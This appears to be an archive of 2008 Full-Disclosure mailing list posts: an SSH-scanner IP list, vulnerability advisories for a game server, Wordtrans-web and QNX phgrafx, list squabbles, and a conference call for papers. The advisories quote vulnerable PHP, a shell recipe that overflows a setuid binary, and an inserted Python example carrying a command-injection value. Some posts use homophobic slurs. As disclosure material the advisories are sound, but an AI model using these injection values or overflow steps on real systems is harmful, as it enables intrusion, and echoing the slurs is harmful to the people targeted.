From jlay at slave-tothe-box.net Tue Jul 1 00:22:21 2008
From: jlay at slave-tothe-box.net (James Lay)
Date: Mon, 30 Jun 2008 17:22:21 -0600
Subject: [Full-disclosure] Recent SSH Scan IP's
Message-ID:

For those that care...it's just a list of the recent SSH scan storm that's been happening the last couple days..pulled fresh from the log files today. Enjoy if it's useful to you, pretend this never happened if not.

James

122.52.185.49
124.30.157.4
134.34.57.150
140.114.75.12
147.99.127.82
157.22.252.78
168.243.151.152
190.86.193.55
193.144.34.220
193.16.208.146
194.29.49.1
195.168.193.227
195.252.122.144
196.211.53.74
196.211.8.90
196.44.177.69
200.13.185.34
200.141.223.99
200.152.223.219
200.164.216.114
200.204.108.200
200.21.231.45
200.241.99.51
200.51.40.154
200.67.193.252
201.216.249.77
201.227.191.115
201.28.213.252
201.37.67.184
202.71.216.126
203.80.236.60
213.135.245.251
213.23.193.42
213.81.133.135
213.96.219.200
217.110.123.114
217.221.55.220
218.65.104.102
58.172.65.98
62.131.15.122
62.147.149.124
62.147.239.186
62.178.7.225
62.2.155.164
62.2.211.46
62.45.17.146
66.159.198.155
67.103.112.92
67.53.204.14
74.93.25.42
75.127.108.26
76.233.35.22
80.153.2.144
80.254.182.86
80.74.148.181
81.183.216.146
81.5.160.149
81.7.92.17
82.144.211.42
82.88.55.72
83.12.137.44
83.15.23.250
83.15.246.226
83.17.126.94
83.208.41.97
84.199.17.218
84.242.66.10
87.139.118.233
87.30.163.87
88.103.123.217
88.247.87.69
88.82.39.76
91.147.232.37
From aluigi at autistici.org Tue Jul 1 01:52:44 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Tue, 1 Jul 2008 01:52:44 +0100
Subject: [Full-disclosure] Endless loop in Soldner 33724
Message-ID: <20080701015244.3dbd600e.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  SÖLDNER - Secret Wars
              http://www.secretwars.net
              http://soldner.jowood.com
Versions:     <= 33724
Platforms:    Windows
Bug:          endless loop
Exploitation: remote, versus server
Date:         01 Jul 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

SÖLDNER is a tactical military game developed by Wings Simulations and released in May 2004.

#######################################################################

======
2) Bug
======

Each UDP packet for this game can contain various blocks of data. The type 0x80 forces the server to perform a cycle from zero to the 32 bit number (so max 0xffffffff) specified in that data block. The maximum size of a packet supported by the game is 1400 bytes, in which it is possible to place max 233 blocks of this type, causing the freeze of a server for over 2 hours (tested with a fast CPU).

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/usurdat.zip

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From ivanhec at gmail.com Tue Jul 1 02:51:49 2008
From: ivanhec at gmail.com (Ivan .)
Date: Tue, 1 Jul 2008 11:51:49 +1000
Subject: [Full-disclosure] I've Seen the Future, and It Has a Kill Switch
Message-ID: <6450e99d0806301851k5e328660l3b4f4fb46e67ec8f@mail.gmail.com>

http://www.wired.com/politics/security/commentary/securitymatters/2008/06/securitymatters_0626

From ureleet at gmail.com Tue Jul 1 04:52:35 2008
From: ureleet at gmail.com (Ureleet)
Date: Mon, 30 Jun 2008 23:52:35 -0400
Subject: [Full-disclosure] Save Gary Mckinnon
In-Reply-To: <4b6ee9310806291904w5b139d9bk923bada99cf0a7d9@mail.gmail.com>
References: <4b6ee9310806291904w5b139d9bk923bada99cf0a7d9@mail.gmail.com>
Message-ID: <6158bb410806302052x14999105t56e281ce6cc4cf8b@mail.gmail.com>

apparently you have no idea what gary mckinnon did. you need to read some more articles.

On Sun, Jun 29, 2008 at 10:04 PM, n3td3v wrote:
> Gary Mckinnon is going to be locked away for 64 years for doing a default
> password scan of the U.S military.
>
> We need to save this guys life, yes he was stupid, yes he was dumb, yes he
> shouldn't have done it.
>
> He is a weirdo who tried to find out about UFO research within military
> ranks, should we send Gary Mckinnon away the same as a suicide bomber
> terrorist?
>
> The U.S military are going to make an example of this man, an example that
> is unjust, we need to save Gary, save Gary... save Gary!
>
> All the best,
>
> n3td3v
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From Everhart at gce.com Tue Jul 1 03:58:53 2008
From: Everhart at gce.com (Mary and Glenn Everhart)
Date: Mon, 30 Jun 2008 22:58:53 -0400
Subject: [Full-disclosure] "what have you released..."
In-Reply-To:
References:
Message-ID: <48699D6D.2020304@gce.com>

full-disclosure-request at lists.grok.org.uk wrote:
> Send Full-Disclosure mailing list submissions to
>         full-disclosure at lists.grok.org.uk
>
> To subscribe or unsubscribe via the World Wide Web, visit
>         https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
>         full-disclosure-request at lists.grok.org.uk
>
> You can reach the person managing the list at
>         full-disclosure-owner at lists.grok.org.uk
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
> Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.
>
> Today's Topics:
>
>    1. Fwd: what problem are we solving? (was Re: ICANN opens up
>       Pandora'sBox of (n3td3v)
>    2. Re: Gadi Evron is a troll (Th3 M0ths)
>    3. Save Gary Mckinnon (n3td3v)
>    4. Re: Let's make a spy-proof communications infrastructure
>       (Jubei Trippataka)
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sun, 29 Jun 2008 23:49:08 +0100
> From: n3td3v
> Subject: [Full-disclosure] Fwd: what problem are we solving? (was Re:
>         ICANN opens up Pandora'sBox of
> To: full-disclosure at lists.grok.org.uk
> Message-ID:
>         <4b6ee9310806291549w40aefeebqde4c3b5ace15895d at mail.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Classic Gadi Evron Gayness! He's currently trolling the I.S.P community via
> NANOG mailing list.
>
> "Because the Internet is not governemned, common misbelief aside. It's a
> mess of capitalism and anarchism. In fact, The Internet is the only
> functioning anarchu."
>
> Hilarious TROLLING effort by Gadi, keep up the good work.
>
> All the best,
>
> n3td3v
>
> ---------- Forwarded message ----------
> From: Gadi Evron
> Date: Sun, Jun 29, 2008 at 9:42 PM
> Subject: Re: what problem are we solving?
> (was Re: ICANN opens up
> Pandora'sBox of
> To: Jim Popovitch
> Cc: nanog at nanog.org
>
>
> On Sun, 29 Jun 2008, Jim Popovitch wrote:
>
>> On Sun, Jun 29, 2008 at 1:21 PM, Peter Beckman
>> wrote:
>>
>>> Let the search engines organize the web, not DNS.
>>>
>> OK, (assuming you believe that), why keep dns around. Why not go back
>> to just IP addrs and hosts files for those that need them.
>>
>
> Because the Internet is not governemned, common misbelief aside. It's a mess
> of capitalism and anarchism. In fact, The Internet is the only functioning
> anarchu.
>
> I see no reason why search engines won't, they already do, whether we want
> to admit it or not, for the home user they ARE the Internet.
>
> Gadi.
>
> -Jim P.
>
> ------------------------------
>
> Message: 2
> Date: Sun, 29 Jun 2008 19:30:54 -0400
> From: "Th3 M0ths"
> Subject: Re: [Full-disclosure] Gadi Evron is a troll
> To: full-disclosure at lists.grok.org.uk
> Message-ID:
>         <1204677e0806291630j7b1045f0tff319c05dfa1f286 at mail.gmail.com>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Homosapien? I'm pretty sure he is a human.
>
> On Sun, Jun 29, 2008 at 2:39 PM, n3td3v wrote:
>
>> On Sun, Jun 29, 2008 at 7:29 PM, Ureleet wrote:
>>
>>> dont start, you were just getting good!
>>>
>> What do you mean getting good, i've been good the whole time homo!
>>
>> All the best,
>>
>> n3td3v
>>
>>
>>> 2008/6/29 n3td3v :
>>>
>>>> Gadi Evron is a troll
>>>>
>>
>
> ------------------------------
>
> Message: 3
> Date: Mon, 30 Jun 2008 03:04:42 +0100
> From: n3td3v
> Subject: [Full-disclosure] Save Gary Mckinnon
> To: full-disclosure at lists.grok.org.uk
> Message-ID:
>         <4b6ee9310806291904w5b139d9bk923bada99cf0a7d9 at mail.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Gary Mckinnon is going to be locked away for 64 years for doing a default
> password scan of the U.S military.
>
> We need to save this guys life, yes he was stupid, yes he was dumb, yes he
> shouldn't have done it.
>
> He is a weirdo who tried to find out about UFO research within military
> ranks, should we send Gary Mckinnon away the same as a suicide bomber
> terrorist?
>
> The U.S military are going to make an example of this man, an example that
> is unjust, we need to save Gary, save Gary... save Gary!
>
> All the best,
>
> n3td3v
>
> ------------------------------
>
> Message: 4
> Date: Mon, 30 Jun 2008 13:35:08 +1000
> From: "Jubei Trippataka"
> Subject: Re: [Full-disclosure] Let's make a spy-proof communications
>         infrastructure
> To: full-disclosure at lists.grok.org.uk
> Message-ID:
>         <1c27cb9a0806292035s2aac3c27k73d68decd87d7d90 at mail.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
>
>> Yes as i've been saying already the intelligence services for years like
>> MI5, MI6 have been laughing at Full-Disclosure for years about us and the
>> media getting excited about internet explorer, fire fox, opera, safari drama
>> and the other likes.
>>
>> While that may be stimulating for some, it hasn't chipped a single inch out
>> of the government and the intelligence services.
>>
>> The biggest government hack of all time? Some faggot weirdo called Gary
>> Mckinnon probing the Pentagon and other government networks with a text file
>> of manufacturer default passwords, and he is about to be extradited to the
>> U.S.A for it and be put in jail for 65 years, lmao!!!
>>
>> The government are laughing their asses off at how softcore the world elite
>> hackers are, we need to crank up a gear and give the government something to
>> think about.
>>
>> I'm not talking about anything illegal or breaking the law, i'm talking
>> about lawful critical vulnerability disclosure on the mailing lists thats
>> going to make the intelligence services and the government wake up and bring
>> real credibility to the mailing list.
>>
>> Right now, folks releasing quicktime flaws and other gay shit, thats so
>> 1999, its time to research and disclose stuff thats going to get you stopped
>> at passport control and have your vulnerability research taken off you for
>> analysis when you plan to do a speech at a security conference etc.
>>
>> Like say, we need to move away from gay shit, and think about the
>> government and the intelligence services, they are currently walking all
>> over all of us, its time to get even technically.
>>
>> All the best,
>>
>> n3td3v
>>
>
> Put your money where your mouth is. What have you released that will make
> the government respect this list?
>
> Secondly, what does FD and the "world of elite hackers" have in common?
> Nothing.
>

I might ask the same question of others. I have released encrypting virtual disks and a distributed multilevel secure kernel (back in 1979) with sources published back then. I have released code for extended authorization controls with a half decent initial approach to controlling mobile code, back in the 1990s again with source code. I have described a few generic defenses against injection attacks and buffer overflows. No matter; this is pointless.
Reciting lists of old software (or hardware) is IMO only useful where contemporary problems might be addressed by that software or its methods (or perhaps when some Johnny come lately tries to patent ideas published decades before).

However the personal attacks are childish and of no interest to me (or, I suspect, to very many others) and distract from the technical question which in this case I tried to pose and which I meant for serious consideration.

It is easy to offer opinions about some political issue. It is not so easy to offer designs. Yet designs for a communication system that will vitiate surveillance and frustrate control freaks may be a great value to all. Publishing THAT kind of article will impress, and deserve honor and praise. If you must think of such as a form of hacking, think of it as hacking whole government agencies all at once, or hacking scores of fraudsters, again all at once.

But can we have technical commentary? Or is this the wrong group?

thanks
Glenn Everhart

From tonnerre.lombard at sygroup.ch Tue Jul 1 07:34:52 2008
From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard)
Date: Tue, 1 Jul 2008 08:34:52 +0200
Subject: [Full-disclosure] so this is FD...
In-Reply-To:
References:
Message-ID: <20080701083452.07c0952d@wssyg117.sygroup-int.ch>

Salut, Lucio Crusca,

On Fri, 27 Jun 2008 08:46:19 +0000, Lucio Crusca wrote:
> I've been reading bugtraq in several short periods of my life, from

Please note that the idea behind full-disclosure and bugtraq is quite a bit different, so you cannot really compare the two. Basically it boils down to: on bugtraq, someone is filtering for you while on f-d, you are responsible to do it yourself.

> after a few months of FD reading, I feel bored again. I've never
> replied to any of the trolls and trolls-feeders on this list, but
> I've always been hardly hoping it was a transient situation, not the
> main (and sometimes only) topic of the list.
Hell, if you filter out

You should consider the constant trolling as "line noise". I have found that an IMAP folder specific bayesian SPAM filter serves quite well to filter out the discussions on this list not worth reading. But of course then you're basically down to advisories and occasional interesting discussions taking place every other month. However, with the appropriate amount of recipient-side filtering, full-disclosure is actually quite readable.

Like Wau Holland used to say, the world usually gets better when you learn to adjust your filters.

Tonnerre

--
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33
Güterstrasse 86
Fax:+41 61 383 14 67
4053 Basel
Web:www.sygroup.ch
tonnerre.lombard at sygroup.ch

From staff at lul-disclosure.net Tue Jul 1 02:57:29 2008
From: staff at lul-disclosure.net (staff)
Date: Mon, 30 Jun 2008 21:57:29 -0400
Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure.
Message-ID:

Are you ready for a site that isn't full of fagottry? Where Gadi cant steal your money or eat your lunches? Where you can freely submit lulz to be published? Where Theo's defeat and denial are brought to light? Wait no more!

http://lul-disclosure.net/

WhiteHat? BlackHat? We are lulzhat. Fuck you and your hats.
From lists at foo.io Tue Jul 1 09:32:34 2008
From: lists at foo.io (fukami)
Date: Tue, 1 Jul 2008 10:32:34 +0200
Subject: [Full-disclosure] CFP 25C3 - The 25th Chaos Communication Congress 2008
Message-ID: <07843905-9035-4C9E-B0C5-36AE1822EDB9@foo.io>

The 25th Chaos Communication Congress (25C3)
============================================

is the annual four-day conference organized by the Chaos Computer Club (CCC) in Berlin, Germany. First held in 1984, it since has established itself as "The European Hacker Conference", attracting a diverse audience of thousands of hackers, scientists, artists, and utopists from all around the world.

We want you to join and be a part of this unique event which serves as a public platform for cross-culture inspiration and borderless networking. 25C3 is fun!

Topics
======

The 25C3 conference program is roughly divided into six general categories. These categories serve as guidelines for your submissions (and later as a means of orientation for your prospective audience). However, it is not mandatory for your talk to exactly match the descriptions below. Anything that is interesting and/or funny will be taken into consideration.

Hacking
-------

The "Hacking" category addresses topics dealing with technology, concentrating on current research with high technical merit. Traditionally, the majority of all lectures at 25C3 revolve around hacking. Topics in this domain include but are in no way limited to: programming, hardware hacking, cryptography, network and system security, security exploits, and creative use of technology.

Making
------

The "Making" category is all about making and breaking things and the wonderful stuff you can build in your basement or garage.
Most welcome are submissions dealing with the latest in electronics, 3D-fabbing, climate-change survival technology, robots and drones, steam machines, alternative transportation tools and guerilla-style knitting.

Science
-------

The "Science" category covers current or future objects of scientific research that have the potential to radically change our lives, be it basic research or projects conducted for the industry. We are looking for talks and papers on the state of the art in this domain, covering subjects such as nano technology, quantum computing, high frequency physics, bio-technology, brain-computer interfaces, automated analysis of surveillance cctv, etc.

Society
-------

Technology development causes great changes in society and will determine our future. This category is for all talks on subjects like hacker tools and the law, surveillance practices, censorship, intellectual property and copyright issues, data retention, software patents, effects of technology on kids, and the impact of technology on society in general.

Culture
-------

Shaping the world we live in means making it more interesting, entertaining and beautiful. The hacker culture has many facets ranging from electronic art objects, stand-up comedy, geek entertainment, video game and board game culture, music, 3D art to e-text literature and beyond. If you like to show your art and teach others how to make their lives more enjoyable, this category is for you.

Community
---------

In addition to individual speakers the Chaos Communication Congress is also inviting groups such as developer teams, projects and activists to present themselves and their topics. Developer groups are also encouraged to ask for support to hold smaller on-site developer conferences and meetings in the course of the Congress.

Further Information
===================

The Chaos Communication Congress is a non-profit oriented event and speakers are not paid.
However, financial help on travel expenses and accommodation is possible. It needs to be agreed upon after acceptance of the submission, though. Don't be shy and state your requirements in the application when submitting your lecture and we'll work something out!

You can find the preliminary agenda and additional information on our 25C3 website at http://events.ccc.de/congress/2008/. For further information and questions please feel free to contact 25c3-content at cccv.de

Submissions
===========

All proposals must be submitted online using our online lecture submission system at https://cccv.pentabarf.org/submission/25C3. Please follow the instructions given there. If you have any questions regarding your submission, feel free to contact us at 25c3-content at cccv.de but do NOT submit your lecture via e-mail.

Language
========

25C3 is an international event and we want to have a lot of interesting talks in English for the benefit of our growing number of international guests. So ideally we are looking for speakers who can give lectures and/or workshops in either English or German. But while we are interested in maximizing the quality of presentations, the topic and its relevance to our community are our main concern. So don't worry about your English skills: the language of a submission is not a criterion for accepting or rejecting it! If you feel insecure talking in English, have received criticism on your language skills from your audience before, or if you just fear that the value and understandability of your lecture might suffer, please offer your talk in German. Please tell us if you are a native speaker of English or have similar skills, when submitting your lecture.

Papers
======

Accepted speakers can optionally hand in a paper which will be published with an ISBN in the 25C3 Proceedings. Papers will be accepted in Portable Document Format (PDF) only and should be around 5 pages. The PDF file must not be password-protected or contain other restrictions.
Paper size should be DIN A4 in portrait orientation. All margins must be set to at least 2 cm (0.78 inches). Pictures should be greyscale and up to 300dpi. Apart from that, you are free to use any layout you want.

Slides
======

Accepted speakers are asked to hand in slides used in their talks. Please use a well-known format for your slides.

Publication
===========

Audio and video recordings of the lectures will be published online in various formats. The Chaos Communication Congress Proceedings are published on paper and online. Only reviewed and accepted talks and presentations will be published.

All material will be available under the Creative Commons Attribution-NonCommercial-NoDerivs 2.0 Germany (BY-NC-ND) license allowing free non-commercial redistribution of the material as long as the original credit to authors and publishers is retained. Licence URI: http://creativecommons.org/licenses/by-nc-nd/2.0/de/

We encourage contributors to publish their work under a more liberal license; if you wish to do so, please state this with your submission.

Dates and Deadlines
===================

The deadline for submission is October 5th, 2008 Midnight (23:59) UTC. Notification of acceptance will be sent by e-mail on November 7th, 2008 the latest. However, you may very well get your notification earlier than that if needed. Final papers or slides are due by November 18th, 2008.

- October 5th, 2008 (Midnight UTC)     Submission due
- November 7th, 2008 (Midnight UTC)    Final notification of acceptance (or earlier)
- November 28th, 2008 (Midnight UTC)   Final papers due
- December 27th - 30th, 2008           Chaos Communication Congress

Lecture Requirements
====================

Lectures should not exceed 45 minutes plus up to 10 minutes for questions and answers. Longer time slots are possible if we feel the topic demands it (please tell us if necessary). Workshops should include a talk on the basic principles in the lecture program and a practical hands-on session in the workshop room.
Criteria which must be met to consider a lecture
================================================

- submission is in time
- for the event all fields in the general and the description tab are filled out
- for the person all fields in the description tab are filled out

Criteria by which we assess a lecture
=====================================

- we consider the topic in general relevant for the participants
- we consider the topic currently relevant for the participants
- we consider the topic interesting, fun and worthy to be known more about
- the lecture is about something the speaker made himself
- we think the lecture might be fun
- the lecture is part of a workshop (has a second part which is a workshop)
- the lecture presents something new
- the more information provided about the lecture and the speaker the better

Criteria by which we do NOT assess a lecture
============================================

- the language
- need for financial help on travel expenses

From research at scanit.net Tue Jul 1 05:25:17 2008
From: research at scanit.net (Scanit Labs)
Date: Tue, 01 Jul 2008 08:25:17 +0400
Subject: [Full-disclosure] [SCANIT-2008-002] Wordtrans-web Remote Command Execution Vulnerability
Message-ID: <1214886317.18366.14.camel@realvirtuality>

Wordtrans-web Remote Command Execution Vulnerability

Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008

Filename: SCANIT-2008-002.txt
SCANIT ID: SCANIT-2008-002
Published: June 30th, 2008

I. Summary

Wordtrans is a free front-end graphical application that allows you to look for words in several dictionaries. It can also translate the word that the user selects with his mouse.

The latest Wordtrans version could allow a remote attacker to execute arbitrary code in the server, caused by an input validation error in the wordtrans-web package, which is a PHP-based Web interface for Wordtrans.

II. Affected Products

This vulnerability affects the wordtrans 1.1pre15 and probably previous versions.

III. Details
By sending a GET request with the variable "command" set to 'show_desc', the variable "link_options" receives one argument from the user, passed via the "advanced" variable using the GET method. Then, the variable "link_options" is concatenated with the variable "exec_wordtrans". Since "exec_wordtrans" is passed to the function "passthru" without checking for special characters, an attacker can send shell characters like | or ; to execute commands in the machine with the privileges of the Web server process at the time the URL is submitted.

This is part of vulnerable script from wordtrans 1.1pre15:

...
$exec_wordtrans = $wordtrans . "-d \"$dict\" ";

switch ($_GET['command']) {
    case "show_desc":
        $exec_wordtrans .= "--desc ";
        $link_options = "--html-link-options \"?lang= $lang_case&advanced=".$_GET['advanced']."&\" ";
        $exec_wordtrans .= $link_options;
        passthru($exec_wordtrans);
        break;
...

To exploit this vulnerability, the "Magic Quotes" option needs to be unset. But since this option was removed from PHP since version 6.0.0, this is a critical vulnerability.

IV. Solution

No vendor response.

V. Timeline

March 1st, 2008 - Vulnerability discovery
March 24th, 2008 - First contact attempt
June 30th, 2008 - Advisory release

VI. Credits

This vulnerability was discovered by Scanit's researchers Filipe Balestra and Rodrigo Rubira Branco (BSDaemon).

VII. Contact

Scanit's R&D Labs represent Scanit's efforts in security research activities. By keeping track of the newest defensive and offensive technologies, Scanit's researchers are able to contribute with unpublished works made in-house. This way, by driving the state-of-the-art in computer security, Scanit honors its commitment to stay in the front line of scientific evolution.

Reach us at research at scanit.net
Visit http://www.scanit.net

VIII. Disclaimer

The information contained in this document may change without notice. Use of this information constitutes acceptance for use in an "AS IS" condition.
There are no warranties regarding the topicality, correctness, completeness or quality of the information provided by this document. Under no circumstances shall the authors be held liable for any direct, indirect, or consequential damages, losses, injuries, or unlawful offences allegedly arising from the use of this information.

Copyright 2008 Scanit Middle East FZ/LLC

From research at scanit.net Tue Jul 1 05:25:21 2008
From: research at scanit.net (Scanit Labs)
Date: Tue, 01 Jul 2008 08:25:21 +0400
Subject: [Full-disclosure] [SCANIT-2008-003] Wordtrans-web Remote Command Execution Vulnerability
Message-ID: <1214886321.18366.15.camel@realvirtuality>

Wordtrans-web Remote Command Execution Vulnerability

Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008

Filename: SCANIT-2008-003.txt
SCANIT ID: SCANIT-2008-003
Published: June 30th, 2008

I. Summary

Wordtrans is a free front-end graphical application that allows you to look for words in several dictionaries. It can also translate the word that the user selects with his mouse.

The latest Wordtrans version could allow a remote attacker to execute arbitrary code in the server, caused by an input validation error in the wordtrans-web package, which is a PHP-based Web interface for Wordtrans.

II. Affected Products

This vulnerability affects the wordtrans 1.1pre15 and probably previous versions.

III. Details

When sending a request without the variable "command" or with an undefined command and any word in the variable "word", the variable "link_options" receives one argument from the user, passed with the "advanced" variable using the POST method. Then, the variable "link_options" is concatenated with the variable "exec_wordtrans". Since "exec_wordtrans" is passed to the function "passthru" without checking for special characters, we can send shell characters like | or ; to execute commands in the machine with privileges of the Web server process when the URL is submitted.
This is part of vulnerable script from wordtrans 1.1pre15:

...
$exec_wordtrans = $wordtrans . "-d \"$dict\" ";

switch ($_GET['command']) {
...
    default:
        if ($_POST['word'] != "") {
            if ($_POST['fullwords'])
                $exec_wordtrans .= " +w ";
            else
                $exec_wordtrans .= " -w ";
            if ($_POST['casesensitive'])
                $exec_wordtrans .= " +c ";
            else
                $exec_wordtrans .= " -c ";
            if ($_POST['invertir'])
                $exec_wordtrans .= " +i ";
            else
                $exec_wordtrans .= " -i ";
            if ($_POST['noacentos'])
                $exec_wordtrans .= " +g ";
            else
                $exec_wordtrans .= " -g ";
            $link_options = "--html-link-options \"?lang= $lang_case&advanced=".$_POST['advanced']."&\" ";
            $exec_wordtrans .= $link_options;
            $exec_wordtrans .= "\"".$_POST['word']."\"";
            passthru($exec_wordtrans);
...

To exploit this vulnerability, the "Magic Quotes" option needs to be unset. But since this option was removed from PHP since version 6.0.0, this is a critical vulnerability.

IV. Solution

No vendor response.

V. Timeline

March 10th, 2008 - Vulnerability discovery
March 24th, 2008 - First contact attempt
June 30th, 2008 - Advisory release

VI. Credits

This vulnerability was discovered by Scanit's researchers Filipe Balestra and Rodrigo Rubira Branco (BSDaemon).

VII. Contact

Scanit's R&D Labs represent Scanit's efforts in security research activities. By keeping track of the newest defensive and offensive technologies, Scanit's researchers are able to contribute with unpublished works made in-house. This way, by driving the state-of-the-art in computer security, Scanit honors its commitment to stay in the front line of scientific evolution.

Reach us at research at scanit.net
Visit http://www.scanit.net

VIII. Disclaimer

The information contained in this document may change without notice. Use of this information constitutes acceptance for use in an "AS IS" condition. There are no warranties regarding the topicality, correctness, completeness or quality of the information provided by this document.
From research at scanit.net Tue Jul 1 05:25:12 2008
From: research at scanit.net (Scanit Labs)
Date: Tue, 01 Jul 2008 08:25:12 +0400
Subject: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability
Message-ID: <1214886312.18366.13.camel@realvirtuality>

QNX phgrafx Privilege Escalation Vulnerability

Scanit R&D Labs Security Advisory
http://www.scanit.net/rd/advisories/
Jun 30, 2008

Filename: SCANIT-2008-001.txt
SCANIT ID: SCANIT-2008-001
Published: June 30th, 2008

I. Summary

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. From QNX's website:

"Companies worldwide like Cisco, Delphi, Siemens, Alcatel and Texaco depend on the QNX technology for network routers, medical devices, intelligent transportation systems, safety and security systems, next-generation robotics, and other mission-critical applications. In addition, QNX forms the core for Ford Motor Co.'s Lincoln Aviator IAV, an engineering concept vehicle. The new system supports the development of next-generation in-car communications, infotainment, and telematics applications."

More information is available at http://www.qnx.com/products/rtos/.

Local exploitation of a buffer overflow vulnerability inside /usr/photon/bin/phgrafx, included by default in the latest QNX RTOS version (6.3.2), could allow an attacker to gain root privileges.

II. Affected Products

Scanit has confirmed the existence of this vulnerability in QNX RTOS 6.3.2 and QNX RTOS 6.3.0. Probably previous versions are vulnerable too.

III. Details

The vulnerability itself exists due to improper handling of the PHOTON_PATH/palette/*.pal file.
When a filename greater than 285 characters is created with the extension .pal in the directory "palette", a stack-based overflow occurs, allowing the attacker to control program flow.

    # PHOTON_PATH=/tmp
    # cd /tmp
    # mkdir palette
    # cd palette
    # touch `perl -e 'print "A" x 290 . ".pal"'`
    # /usr/photon/bin/phgrafx
    Memory fault (core dumped)
    #

IV. Solution

According to the vendor's response:

"QNX Software Systems confirms this vulnerability in Momentics 6.3.2 and earlier versions. The phgrafx binary is to be deprecated in future releases. For the time being, it is recommended that the user clear the set user ID bit from the file permissions. If this is done, only the root user may change the graphics configuration."

V. Timeline

February 20th, 2008 - Vulnerability discovery
March 24th, 2008 - First contact attempt
March 27th, 2008 - Vendor response
June 30th, 2008 - Advisory release

VI. Credits

This vulnerability was discovered by Scanit's researchers Filipe Balestra and Rodrigo Rubira Branco (BSDaemon).

VII. Contact

Scanit's R&D Labs represent Scanit's efforts in security research activities. By keeping track of the newest defensive and offensive technologies, Scanit's researchers are able to contribute with unpublished works made in-house. This way, by driving the state-of-the-art in computer security, Scanit honors its commitment to stay in the front line of scientific evolution.

Reach us at research at scanit.net
Visit http://www.scanit.net
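The wordtrans-web advisory (SCANIT-2008-003) above is a case of assembling a shell command string from request parameters. The following is an added example, not wordtrans-web's own code (which is PHP): a Python model of the same assembly that shows how /bin/sh tokenises the concatenated string, the missing metacharacter check, and the argv form in which a "word" containing ; or | stays one argument. The flag and parameter names come from the snippet; the WORDTRANS path is a placeholder.

```python
"""Command assembly as in the wordtrans-web snippet, modelled in Python.

Constructed example: it never runs wordtrans itself. build_string() mirrors
the PHP concatenation handed to passthru(); build_argv() is the hardened form.
"""
import shlex
import subprocess
import sys

WORDTRANS = "/usr/bin/wordtrans"  # placeholder path, not taken from the advisory
SHELL_META = set('|;&$`<>()\n"\'\\')  # characters /bin/sh treats specially

# (form field, flag when the field is set, flag when unset), as in the PHP switch
FLAGS = (
    ("fullwords", "+w", "-w"),
    ("casesensitive", "+c", "-c"),
    ("invertir", "+i", "-i"),
    ("noacentos", "+g", "-g"),
)


def build_string(dictionary, params, lang="en"):
    """Vulnerable form: one shell string, like $exec_wordtrans in the advisory."""
    cmd = f'{WORDTRANS} -d "{dictionary}" '
    for name, on, off in FLAGS:
        cmd += f" {on} " if params.get(name) else f" {off} "
    cmd += f'--html-link-options "?lang={lang}&advanced={params.get("advanced", "")}&" '
    cmd += f'"{params.get("word", "")}"'  # the POSTed word, quoted but unescaped
    return cmd


def shell_tokens(cmd):
    """Tokenise the string as /bin/sh would, keeping | ; & as their own tokens.

    A word such as  x"; id; "  closes the quote and yields a second command.
    """
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    return list(lex)


def has_shell_metachars(value):
    """The check the advisory says is missing before passthru()."""
    return any(c in SHELL_META for c in value)


def build_argv(dictionary, params, lang="en"):
    """Hardened form: an argv list, so no shell ever interprets the values."""
    argv = [WORDTRANS, "-d", dictionary]
    for name, on, off in FLAGS:
        argv.append(on if params.get(name) else off)
    argv += ["--html-link-options", f"?lang={lang}&advanced={params.get('advanced', '')}&"]
    argv.append(params.get("word", ""))  # one argument whatever it contains
    return argv


def argv_keeps_word_intact(word):
    """Pass the word through a child process as an argv element (a Python
    one-liner stands in for wordtrans) and confirm it arrives unchanged."""
    out = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", word],
        capture_output=True, text=True, check=True)
    return out.stdout == word


if __name__ == "__main__":
    hostile = {"word": 'x"; id; "', "advanced": "1"}  # constructed request
    print(build_string("en-es", hostile))
    print(shell_tokens(build_string("en-es", hostile)))
    print(build_argv("en-es", hostile))
    print(argv_keeps_word_intact(hostile["word"]))
```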
From keytoaster at gentoo.org Tue Jul 1 12:51:43 2008
From: keytoaster at gentoo.org (Tobias Heinlein)
Date: Tue, 01 Jul 2008 13:51:43 +0200
Subject: [Full-disclosure] [ GLSA 200807-01 ] Python: Multiple integer overflows
Message-ID: <486A1A4F.1080404@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200807-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Python: Multiple integer overflows
      Date: July 01, 2008
      Bugs: #216673, #217221
        ID: 200807-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple integer overflows may allow for Denial of Service.

Background
==========

Python is an interpreted, interactive, object-oriented programming language.

Affected packages
=================

    -------------------------------------------------------------------
